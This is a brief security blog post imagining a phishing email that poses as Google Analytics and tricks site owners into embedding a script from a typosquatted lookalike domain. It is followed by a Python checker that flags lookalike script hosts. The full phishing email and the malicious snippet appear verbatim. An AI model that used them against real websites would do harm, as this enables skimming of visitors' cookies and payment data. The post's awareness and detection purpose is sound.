Phishing for an Analytics Injection

November 30, 2019

The recent Magecart attacks on Macy's and other e-commerce sites have led me to ponder new ways an attacker could inject code into a website. Here's one idea I came up with. Imagine receiving the following email:


from: analytics-noreply@google.com
to: your@email.com

Dear Google Analytics Customer,

We recently redesigned our infrastructure to provide new data retention 
controls that allow you to configure how long your user and event data
are stored by Google Analytics. Due to these changes, we require all 
Google Analytics customers to replace their Google Analytics tracking 
code with the following:

<script async src="https://www.googletaggmanager.com/gtag/js?id=UA-12345678-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-12345678-1');
</script>

Please remember to make these changes before December 15, 2019 in order 
to retain access to your Google Analytics data.

Thanks,
The Google Analytics Team

When the user falls for this phishing attack and embeds this snippet into their website, the attacker will be able to run their JavaScript (hosted on googletaggmanager.com, a lookalike of the real googletagmanager.com) and steal cookies, credit cards, etc. I wonder what percentage of website owners would fall for this.
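One defensive check for this scenario, added here as an example that is not part of the original post: audit the external scripts a page loads and flag any host that is within a couple of edits of an analytics domain the site legitimately uses. The allowlist and the sample page are assumptions constructed for the example; the lookalike host is the one from the email above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads analytics from (assumed allowlist; tailor per site).
KNOWN_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}

def levenshtein(a, b):
    """Edit distance between two strings (insert/delete/substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

class ScriptSrcParser(HTMLParser):
    """Collects the src attribute of every <script> tag that has one."""
    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)

def audit_scripts(html, known_hosts=KNOWN_HOSTS, max_distance=2):
    """Return (src, verdict) per external script: 'allowed' for a known host,
    'lookalike' if within max_distance edits of one, otherwise 'unknown'."""
    parser = ScriptSrcParser()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = (urlparse(src).hostname or "").lower()
        if host in known_hosts:
            verdict = "allowed"
        elif any(levenshtein(host, k) <= max_distance for k in known_hosts):
            verdict = "lookalike"
        else:
            verdict = "unknown"
        findings.append((src, verdict))
    return findings

# Constructed sample page: the genuine gtag loader beside the typosquatted one.
SAMPLE_PAGE = """<html><head>
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-12345678-1"></script>
<script async src="https://www.googletaggmanager.com/gtag/js?id=UA-12345678-1"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://cdn.example.net/app.js"></script>
</head></html>"""

if __name__ == "__main__":
    for src, verdict in audit_scripts(SAMPLE_PAGE):
        print(f"{verdict:10} {src}")
```

Run it against your deployed HTML (or in CI against the templates) and treat any 'lookalike' verdict as a finding to investigate; 'unknown' hosts are the candidates for extending the allowlist.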